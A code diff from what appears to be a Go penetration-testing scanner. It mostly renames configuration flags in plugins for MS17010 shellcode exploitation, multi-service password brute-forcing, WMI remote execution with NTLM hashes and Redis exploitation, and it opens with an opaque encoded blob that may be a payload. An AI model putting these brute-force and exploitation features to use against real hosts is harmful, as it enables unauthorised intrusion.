"gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK" @@ -56,15 +56,15 @@ func MS17010EXP(info *Common.HostInfo) { default: // 从文件读取或直接使用提供的shellcode - if strings.Contains(Common.SC, "file:") { - read, err := ioutil.ReadFile(Common.SC[5:]) + if strings.Contains(Common.Shellcode, "file:") { + read, err := ioutil.ReadFile(Common.Shellcode[5:]) if err != nil { - Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.SC, err)) + Common.LogError(fmt.Sprintf("[-] MS17010读取Shellcode文件 %v 失败: %v", Common.Shellcode, err)) return } sc = fmt.Sprintf("%x", read) } else { - sc = Common.SC + sc = Common.Shellcode } } diff --git a/Plugins/MS17010.go b/Plugins/MS17010.go index 45b18fc..0d808d4 100644 --- a/Plugins/MS17010.go +++ b/Plugins/MS17010.go @@ -84,7 +84,7 @@ func init() { // MS17010 扫描入口函数 func MS17010(info *Common.HostInfo) error { // 暴力破解模式下跳过扫描 - if Common.IsBrute { + if Common.DisableBrute { return nil } @@ -200,7 +200,7 @@ func MS17010Scan(info *Common.HostInfo) error { // 如果指定了shellcode,执行漏洞利用 defer func() { - if Common.SC != "" { + if Common.Shellcode != "" { MS17010EXP(info) } }() diff --git a/Plugins/MSSQL.go b/Plugins/MSSQL.go index d69bafa..c4ea972 100644 --- a/Plugins/MSSQL.go +++ b/Plugins/MSSQL.go @@ -11,7 +11,7 @@ import ( // MssqlScan 执行MSSQL服务扫描 func MssqlScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/Mongodb.go b/Plugins/Mongodb.go index 38a61ef..bc83a28 100644 --- a/Plugins/Mongodb.go +++ b/Plugins/Mongodb.go @@ -9,7 +9,7 @@ import ( // MongodbScan 执行MongoDB未授权扫描 func MongodbScan(info *Common.HostInfo) error { - if Common.IsBrute { + if Common.DisableBrute { return nil } diff --git a/Plugins/MySQL.go b/Plugins/MySQL.go index a4f7fa4..1b03a37 100644 --- a/Plugins/MySQL.go +++ b/Plugins/MySQL.go @@ -11,7 +11,7 @@ import ( // MysqlScan 执行MySQL服务扫描 func MysqlScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/Oracle.go b/Plugins/Oracle.go index 0d05884..ddab0e9 100644 --- a/Plugins/Oracle.go +++ b/Plugins/Oracle.go @@ -11,7 +11,7 @@ import ( // OracleScan 执行Oracle服务扫描 func OracleScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/Postgres.go b/Plugins/Postgres.go index d2a8b89..0fa446b 100644 --- a/Plugins/Postgres.go +++ b/Plugins/Postgres.go @@ -11,7 +11,7 @@ import ( // PostgresScan 执行PostgreSQL服务扫描 func PostgresScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/RDP.go b/Plugins/RDP.go index 3bbfab3..fdc7104 100644 --- a/Plugins/RDP.go +++ b/Plugins/RDP.go @@ -30,7 +30,7 @@ type Brutelist struct { // RdpScan 执行RDP服务扫描 func RdpScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } @@ -47,7 +47,7 @@ func RdpScan(info *Common.HostInfo) (tmperr error) { port, _ := strconv.Atoi(info.Ports) // 启动工作协程 - for i := 0; i < Common.BruteThread; i++ { + for i := 0; i < Common.BruteThreads; i++ { wg.Add(1) go worker(info.Host, Common.Domain, port, &wg, brlist, &signal, &num, all, &mutex, Common.Timeout) } diff --git a/Plugins/Redis.go b/Plugins/Redis.go index 7dfd978..7b68dba 100644 --- a/Plugins/Redis.go +++ b/Plugins/Redis.go @@ -27,7 +27,7 @@ func RedisScan(info *Common.HostInfo) (tmperr error) { return err } - if Common.IsBrute { + if Common.DisableBrute { return } @@ -167,7 +167,7 @@ func RedisUnauth(info *Common.HostInfo) (flag bool, err error) { // Expoilt 尝试Redis漏洞利用 func Expoilt(realhost string, conn net.Conn) error { // 如果配置为不进行测试则直接返回 - if Common.Noredistest { + if Common.DisableRedis { return nil } diff --git a/Plugins/SMB.go b/Plugins/SMB.go index ffd5c6b..b6afaf9 100644 --- a/Plugins/SMB.go +++ b/Plugins/SMB.go @@ -12,7 +12,7 @@ import ( // SmbScan 执行SMB服务的认证扫描 func SmbScan(info *Common.HostInfo) (tmperr error) { // 如果未启用暴力破解则直接返回 - if Common.IsBrute { + if Common.DisableBrute { return nil } diff --git a/Plugins/SMB2.go b/Plugins/SMB2.go index 1e157c3..e636673 100644 --- a/Plugins/SMB2.go +++ b/Plugins/SMB2.go @@ -15,7 +15,7 @@ import ( func SmbScan2(info *Common.HostInfo) (tmperr error) { // 如果未启用暴力破解则直接返回 - if Common.IsBrute { + if Common.DisableBrute { return nil } @@ -51,7 +51,7 @@ func smbHashScan(info *Common.HostInfo, hasprint bool, startTime int64) error { return err } - if len(Common.Hash) > 0 { + if len(Common.HashValue) > 0 { break } } @@ -80,7 +80,7 @@ func smbPasswordScan(info *Common.HostInfo, hasprint bool, startTime int64) erro return err } - if len(Common.Hash) > 0 { + if len(Common.HashValue) > 0 { break } } @@ -101,7 +101,7 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) { } if len(hash) > 0 { - result += fmt.Sprintf("Hash:%v", Common.Hash) + result += fmt.Sprintf("HashValue:%v", Common.HashValue) } else { result += fmt.Sprintf("Pass:%v", pass) } @@ -112,8 +112,8 @@ func logSuccessfulAuth(info *Common.HostInfo, user, pass string, hash []byte) { func logFailedAuth(info *Common.HostInfo, user, pass string, hash []byte, err error) { var errlog string if len(hash) > 0 { - errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Hash:%v Err:%v", - info.Host, info.Ports, user, Common.Hash, err) + errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v HashValue:%v Err:%v", + info.Host, info.Ports, user, Common.HashValue, err) } else { errlog = fmt.Sprintf("[x] SMB2认证失败 %v:%v User:%v Pass:%v Err:%v", info.Host, info.Ports, user, pass, err) @@ -213,7 +213,7 @@ func logShareInfo(info *Common.HostInfo, user string, pass string, hash []byte, // 添加认证信息 if len(hash) > 0 { - result += fmt.Sprintf("Hash:%v ", Common.Hash) + result += fmt.Sprintf("HashValue:%v ", Common.HashValue) } else { result += fmt.Sprintf("Pass:%v ", pass) } diff --git a/Plugins/SSH.go b/Plugins/SSH.go index b56267e..d488da1 100644 --- a/Plugins/SSH.go +++ b/Plugins/SSH.go @@ -12,7 +12,7 @@ import ( ) func SshScan(info *Common.HostInfo) (tmperr error) { - if Common.IsBrute { + if Common.DisableBrute { return } @@ -82,7 +82,7 @@ func SshScan(info *Common.HostInfo) (tmperr error) { } // 如果指定了SSH密钥,则不进行密码尝试 - if Common.SshKey != "" { + if Common.SshKeyPath != "" { return err } } @@ -94,8 +94,8 @@ func SshScan(info *Common.HostInfo) (tmperr error) { func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass string) (flag bool, err error) { // 准备认证方法 var auth []ssh.AuthMethod - if Common.SshKey != "" { - pemBytes, err := ioutil.ReadFile(Common.SshKey) + if Common.SshKeyPath != "" { + pemBytes, err := ioutil.ReadFile(Common.SshKeyPath) if err != nil { return false, fmt.Errorf("[-] 读取密钥失败: %v", err) } @@ -203,7 +203,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin if result.err != nil { return true, result.err } - if Common.SshKey != "" { + if Common.SshKeyPath != "" { Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v\n命令输出:\n%v", info.Host, info.Ports, string(result.output))) } else { @@ -212,7 +212,7 @@ func SshConn(ctx context.Context, info *Common.HostInfo, user string, pass strin } } } else { - if Common.SshKey != "" { + if Common.SshKeyPath != "" { Common.LogSuccess(fmt.Sprintf("[+] SSH密钥认证成功 %v:%v", info.Host, info.Ports)) } else { diff --git a/Plugins/SmbGhost.go b/Plugins/SmbGhost.go index 1615dd0..daa2c5b 100644 --- a/Plugins/SmbGhost.go +++ b/Plugins/SmbGhost.go @@ -97,7 +97,7 @@ const ( // SmbGhost 检测SMB Ghost漏洞(CVE-2020-0796)的入口函数 func SmbGhost(info *Common.HostInfo) error { // 如果开启了暴力破解模式,跳过该检测 - if Common.IsBrute { + if Common.DisableBrute { return nil } diff --git a/Plugins/VNC.go b/Plugins/VNC.go index d1d7c20..74bcb1d 100644 --- a/Plugins/VNC.go +++ b/Plugins/VNC.go @@ -11,7 +11,7 @@ import ( // VncScan 执行VNC服务扫描及密码尝试 func VncScan(info *Common.HostInfo) (tmperr error) { // 如果已开启暴力破解则直接返回 - if Common.IsBrute { + if Common.DisableBrute { return } diff --git a/Plugins/WMIExec.go b/Plugins/WMIExec.go index ec38746..a55f1f7 100644 --- a/Plugins/WMIExec.go +++ b/Plugins/WMIExec.go @@ -34,7 +34,7 @@ func init() { // WmiExec 执行WMI远程命令 func WmiExec(info *Common.HostInfo) (tmperr error) { // 如果是暴力破解模式则跳过 - if Common.IsBrute { + if Common.DisableBrute { return nil } @@ -49,7 +49,7 @@ func WmiExec(info *Common.HostInfo) (tmperr error) { pass = strings.Replace(pass, "{user}", user, -1) // 尝试WMI连接 - flag, err := Wmiexec(info, user, pass, Common.Hash) + flag, err := Wmiexec(info, user, pass, Common.HashValue) // 记录错误日志 errlog := fmt.Sprintf("[-] WmiExec %v:%v %v %v %v", info.Host, 445, user, pass, err) @@ -66,8 +66,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) { } // 添加认证信息到结果 - if Common.Hash != "" { - result += "hash: " + Common.Hash + if Common.HashValue != "" { + result += "hash: " + Common.HashValue } else { result += pass } @@ -85,8 +85,8 @@ func WmiExec(info *Common.HostInfo) (tmperr error) { } } - // 如果使用NTLM Hash,则跳过密码循环 - if len(Common.Hash) == 32 { + // 如果使用NTLM HashValue,则跳过密码循环 + if len(Common.HashValue) == 32 { break PASS } } diff --git a/Plugins/WebTitle.go b/Plugins/WebTitle.go index 9f8bc0b..9337601 100644 --- a/Plugins/WebTitle.go +++ b/Plugins/WebTitle.go @@ -21,7 +21,7 @@ import ( // WebTitle 获取Web标题并执行扫描 func WebTitle(info *Common.HostInfo) error { // 如果是webpoc扫描模式,直接执行WebScan - if Common.Scantype == "webpoc" { + if Common.ScanMode == "webpoc" { WebScan.WebScan(info) return nil } @@ -38,7 +38,7 @@ func WebTitle(info *Common.HostInfo) error { } // 根据配置决定是否执行漏洞扫描 - if !Common.NoPoc && err == nil { + if !Common.DisablePoc && err == nil { WebScan.WebScan(info) } else { errlog := fmt.Sprintf("[-] webtitle %v %v", info.Url, err) diff --git a/WebScan/lib/Client.go b/WebScan/lib/Client.go index 96aa477..442bf7d 100644 --- a/WebScan/lib/Client.go +++ b/WebScan/lib/Client.go @@ -37,7 +37,7 @@ func Inithttp() { } // 初始化HTTP客户端 - err := InitHttpClient(Common.PocNum, Common.Proxy, time.Duration(Common.WebTimeout)*time.Second) + err := InitHttpClient(Common.PocNum, Common.HttpProxy, time.Duration(Common.WebTimeout)*time.Second) if err != nil { panic(err) } diff --git a/WebScan/lib/Eval.go b/WebScan/lib/Eval.go index eaf0312..79406a4 100644 --- a/WebScan/lib/Eval.go +++ b/WebScan/lib/Eval.go @@ -57,7 +57,7 @@ func Evaluate(env *cel.Env, expression string, params map[string]interface{}) (r return result, nil } -// UrlTypeToString 将 URL 结构体转换为字符串 +// UrlTypeToString 将 TargetURL 结构体转换为字符串 func UrlTypeToString(u *UrlType) string { var builder strings.Builder @@ -604,7 +604,7 @@ func reverseCheck(r *Reverse, timeout int64) bool { // 提取子域名 sub := strings.Split(r.Domain, ".")[0] - // 构造 API 请求 URL + // 构造 API 请求 TargetURL apiURL := fmt.Sprintf("http://api.ceye.io/v1/records?token=%s&type=dns&filter=%s", ceyeApi, sub) @@ -700,7 +700,7 @@ func DoRequest(req *http.Request, redirect bool) (*Response, error) { return resp, err } -// ParseUrl 解析 URL 并转换为自定义 URL 类型 +// ParseUrl 解析 TargetURL 并转换为自定义 TargetURL 类型 func ParseUrl(u *url.URL) *UrlType { return &UrlType{ Scheme: u.Scheme, @@ -782,10 +782,10 @@ func getRespBody(oResp *http.Response) ([]byte, error) { defer reader.Close() decompressed, err := io.ReadAll(reader) - if err != nil && err != io.EOF && len(decompressed) == 0{ + if err != nil && err != io.EOF && len(decompressed) == 0 { return nil, err } - if len(decompressed) == 0 && len(body) != 0{ + if len(decompressed) == 0 && len(body) != 0 { return body, nil } return decompressed, nil